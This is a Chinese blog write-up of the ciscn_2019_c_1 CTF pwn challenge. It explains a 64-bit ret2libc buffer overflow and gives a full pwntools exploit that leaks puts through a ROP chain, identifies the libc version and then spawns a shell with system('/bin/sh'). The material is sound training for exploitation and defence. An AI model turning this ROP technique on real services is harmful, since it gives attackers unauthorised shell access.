ciscn_2019_c_1

最新推荐文章于 2024-05-03 23:27:39 发布
最新推荐文章于 2024-05-03 23:27:39 发布
阅读量8.8k 收藏 19
点赞数 10
分类专栏: Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45913417/article/details/121408985
版权

经典ret2libc,着实恶心到我了。前后捣鼓了将近3、4个小时,勉强把原理理解透彻。
边做题边C语言:艹!
checksec.png
main.png
encrypt.png
输入字符串s加密逻辑:
1、如果是小写字母跟0xD异或
2、如果是大写字母跟0xE异或
3、如果是数字跟0xF异或
[ASCII码对照表]:(http://c.biancheng.net/c/ascii/)
ROPgadget.png
泄露libc.png
LibcSearcher工具:https://github.com/dev2ero/LibcSearcher

from pwn import *
from LibcSearcher import *

context(os = 'linux', arch = 'amd64', log_level = 'debug')

# io = process('ciscn_2019_c_1')
io = remote('redirect.do-not-trust.hacking.run', 10312)
elf = ELF('./ciscn_2019_c_1')
// 本地换了多个版本libc打
# libc = ELF('./libc-2.27.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']

# ROPgadget --binary ciscn_2019_c_1 --only 'pop|ret'
pop_rdi_ret = 0x0000000000400c83
# ROPgadget --binary ciscn_2019_c_1 --only 'ret'
ret_addr = 0x00000000004006b9

io.sendlineafter('Input your choice!\n', '1')
// '\0'用来strlen函数绕过,防止输入加密字符串s被加密,第一个payload用来获得libc
# payload = b'\0' + b'a' * (0x50 + 0x08 - 0x01) + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
payload = b'a' * 0x58 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('Input your Plaintext to be encrypted\n', payload)
# io.recvuntil('Ciphertext\n')
io.recvline()
io.recvline()
// 接收puts函数打印回显值,截取低三位,分页机制导致libc后三位恒不变,加以区分。
# puts_addr = u64(io.recv(7)[:-1].ljust(8,b'\x00'))
# puts_addr = u64(io.recvuntil('\n',drop=True).ljust(8,b'\x00'))
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))

// 工具获取libc版本号并计算偏移值,然后计算后门函数内存地址。
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
// 本地libc计算相应内存地址。
# libc_base = puts_addr - libc.symbols['puts']
# system_addr = libc_base + libc.symbols['system']
# binsh_addr = libc_base + libc.search('/bin/sh').next()

io.sendlineafter('Input your choice!\n', b'1')
// 第二个payload用来获取shell,高版本libc加上ret来平衡堆栈。
payload7 = b'\0' + b'a' * (0x50 + 0x08 - 0x01) + p64(ret_addr) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
# payload7 = b'\0' + b'a' * (0x50 + 0x08 - 0x01) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
# payload7 = b'a' * 0x58 + p64(ret_addr) + p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr)
sleep(1)
io.sendlineafter('encrypted\n', payload7)

# io.shutdown('send')
io.interactive()

[栈平衡和栈转移(Stack-Pivot) | 偏有宸机 (gitee.io)]:(https://oneda1sy.gitee.io/2020/02/24/stack-balance/)
本地和远程.png

思考:
1、32位和64位泄露libc的payload和shell的payload如何构造;
2、libc低三位决定版本号的原因:分页机制;
3、完整逆向程序,看懂代码逻辑;
4、栈平衡原理;
5、plt和got表,延迟绑定机制;
6、bug、bug、bug,炸裂再修补;
7、忍不住爆句粗口,👴要去做堆题了。

北岛静石师傅:
不同libc版本代码会有修改, 导致它基地址会发生改变
然后由于页对齐机制
4kb为一页
4kb=4*1024=2^12=0x1000
所有页都是这样对齐的, 所以在分配给动态链接库的时候
不会影响到低三字节
由此可以确定版本信息了
那种分配给动态链接库的内存, 也是n个页
n*0x1000怎么样都不会影响低三字节的
半步行止
关注
专栏目录
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4416
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 272
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
BUUCTF ciscn_2019_c_1
、moddemod
06-01 1278
跑一下程序,大致流程是 到现在程序就基本分析完成,接下来需要构造rop泄露libc地址然后利用system等函数获得shell 我们首先要获得libc的基地址,可以通过puts函数入手,这里解释一下为什么通过puts函数而不通过其他函数,因为puts函数在我们进入encrypt函数之前已经调用了很多次了,对于每一个动态链接而言,第一次调用完成以后,就修正了.got表中的对应的puts函数的地址,所以我们可以通过puts函数泄露。 from pwn import * from LibcSearc.
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 821
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
【BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4102
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 436
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1345
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
ciscn_2019_c_1[BUUCTF]
最新发布
moonlightsunshin的博客
05-03 646
但是程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露出libc基址构造payload来泄露libc。在amd64架构下参数通过rdi传递0x400c83就是我们需要pop_rdi的地址。拿到题先三板斧hecksec --file=ciscn_2019_c_1看保护。开启了NX优先考虑ROP但是关闭了PIE则可能存在缓冲区溢出。查看堆栈窗口得到缓冲区大小 构造0x50+0x8即可溢出。得到 /bin/sh的地址。发现gets函数存在溢出。如果不行就换一个libc。
评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半步行止

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值